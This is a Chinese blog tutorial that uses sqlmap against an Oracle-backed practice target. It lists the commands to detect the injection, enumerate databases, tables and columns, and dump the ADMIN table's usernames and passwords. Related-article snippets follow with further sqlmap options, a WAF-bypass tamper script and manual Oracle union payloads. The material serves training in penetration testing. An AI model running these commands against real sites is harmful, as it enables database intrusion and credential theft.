SqlMap——Oracle注入教程

最新推荐文章于 2025-03-03 18:06:05 发布
最新推荐文章于 2025-03-03 18:06:05 发布
阅读量4.3k 收藏 6
点赞数 1
分类专栏: # SQL注入 文章标签: hadoop 大数据 big data
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/121650292
版权

一、漏洞复现

靶场注入点: http://59.63.200.79:8808/?id=1

1、使用sqlmap检测是否存在注入点

python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent

在这里插入图片描述
检测发现存在注入点,注入点在参数id的位置,数据库为Oracle数据库
在这里插入图片描述

2、查看Oracle中全部的数据库

python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent --dbs

在这里插入图片描述
查询出来全部的数据库如下所示
在这里插入图片描述
3、查看当前网站使用的数据库

python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent --cueernt-db

在这里插入图片描述
当前网站使用的数据库:ORACLE1
在这里插入图片描述
4、查看 ORACLE1 数据库的所有表名

python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent -D ORACLE1 --tables

在这里插入图片描述
在这里插入图片描述
5、查看 ORACLE1 数据库的ADMIN表的所有列名

python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent -D ORACLE1 -T ADMIN --columns

在这里插入图片描述
在这里插入图片描述
6、查看所有字段的值

python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent -D ORACLE1 -T ADMIN -C UNAME,UPASS --dump

在这里插入图片描述
爆破出账号密码
在这里插入图片描述

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
在这里插入图片描述

Oracle学习总结(6)—— SQL注入技术
科技D人生
09-23 3081
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行
sqlmap基本用法和联合注入
weixin_44098523的博客
02-02 2079
sqlmap基本用法 cookie注入sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的...
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1499
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
sqlmap 注入oracle,使用 sqlmap 进行 SQL 注入检测
weixin_34915171的博客
04-13 1708
为什么80%的码农都做不了架构师?>>> 最近在看《白帽子讲 Web 安全》,讲服务器端注入攻击时提到一个神器 sqlmap。到 Github:sqlmap 下载工具,到目录下运行python sqlmap.py -u "https://my.oschina.net/lvyi/blog?catalog=423226&temp=1476090615355"即可开始分析有没有...
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
ewii12567的博客
03-03 2944
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…这里root的权限最多,很明显它就是数据库的管理员账号。
记一次使用sqlmaporacle进行like注入
weixin_45439432的博客
12-17 4075
环境:jsp+oracle 从FUZZ的结果以及http响应的长度来看,普通的注入被waf拦截,存在like注入 like注入其实也并不是两边都要有 %,我们只需要闭合单引号就行了: 接下来用sysdata参数可以确定数据库为oracle。 sysdata函数为oracle数据库的日期,length求的是字符长度,可构造语句: 1’ AND LENGTH(SYSDATE) LIKE LENGTH(SYSDATE) AND ‘NGjD’ LIKE 'NGjD 现在可以确定存在注入了,于是移步到工具使用环
sqlmap实战oracle,网络攻防实战-sqlmap从入门到精通
weixin_39950083的博客
04-14 645
网络攻防实战-sqlmap从入门到精通第1章sqlmap安装及搭建测试平台1.1在windows上安装sqlmap1.2在centos上安装sqlmap1.3在kali虚拟机中安装及使用sqlmap1.4在kali上搭建dvwa测试平台1.5在windows上搭建sqlab测试平台第2章sqlmap基础及使用2.1配置sqlmap2.2sqlmap目录及结构2.3SQLMap使用攻略及技巧-已经完...
SQL注入Oracle,MongoDB等注入
weixin_51583033的博客
02-15 379
SQL注入Oracle,MongoDB等注入
SQLMap——解决SQL注入的棒棒棒工具
weixin_49816293的博客
01-05 391
一、简介。
26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2
qq_55202378的博客
01-01 1666
SQL注入课程体系;
Access数据库——Cookie注入
weixin_53026460的博客
11-18 1552
SQL注入的本质是用户输入的数据会被当作代码执行;Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果获取了管理员的Cookie,你可以无需密码直接登录管理员账号;数据库有很多种类,常见的数据库有Access、Mysql、msSQL(sql server)、Oracle,前面我们学的联合查询和盲注那些语句都是Mysql的内容;POST注入和HEAD注入其实就是传参方式不同来分类,比如说POST注入的GET传参和POST传参 就是根据传参方式不同来分类的,POST注入不存在数据库限制
掌握SQL注入利器——sqlmap-0.9版本发布
2. 数据库管理系统(DBMS):Sqlmap主要针对的数据库管理系统包括但不限于MySQL、PostgreSQL、SQLite、Oracle、Microsoft SQL Server、Microsoft Access、IBM DB2、Informix、Sybase和HSQLDB。工具能够自动检测目标...
SQL注入oracle注入+SQLbypass+sqlmap实战
2301_80661529的博客
02-21 1465
Oracle数据库是全球最知名的关系型数据库管理系统(RDBMS)之一,由美国甲骨文公司(Oracle Corporation)开发并维护。作为企业级数据管理解决方案的市场领导者,Oracle数据库在可靠性、安全性、可伸缩性和性能方面具有卓越表现,被广泛应用于各类关键业务场景,包括金融、电信、政府和大型企业的各种复杂应用。**核心特性:**
sqlmap oracle绕过,sqlmap的篡改绕过WAF
weixin_39790738的博客
04-04 282
space2comment.pyReplaces space character (‘ ‘) with comments ‘/**/’Example:* Input: SELECT id FROM users* Output: SELECT/**/id/**/FROM/**/usersTested against:* Microsoft SQL Server 2005* MySQL 4, 5.0 ...
sqlmap注入oracle库,2020-04-01 sqlmap注入神器SQLMap工具技巧
weixin_39966053的博客
04-07 1305
sqlmap.py -u http://192.168.0.108/sqlserver/1.aspx?xxser=1sqlmap.py -uhttp://192.168.0.108/sqlserver/1.aspx?xxser=1 --leve=3–-level=LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当...
sqlmap工具的实操--sql注入
weixin_66839513的博客
04-01 5123
sql注入原理就是将恶意的sql语句通过表单或者url拼接到web后端的查询语句中,绕过后端的认证,在后端被服务器执行恶意的sql语句,获取到数据库的权限,从而对数据库进行执行操作,造成数据的篡改及泄露。
第26天:WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等
wuqingsix的博客
11-18 511
Oracle:(注入语句和之前的mysql类似,Mongodb 看代码(python数据库),#SQLMAP使用,测回显:and 1=2 union select '1','2' from dual 爆库:and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual 模糊爆库:and 1=2 union select '1',(select table_name from user_tab
sqlmap注入用法
w786572258的专栏
12-30 3510
下载git clone git://github.com/sqlmapproject/sqlmap.git用法检查注入sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11列数据库信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs指定库名列出所有表sqlmap -
SQLMAP教程,零基础入门到精通,一篇就够了!
程序员阿飘 的博客
02-19 1393
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值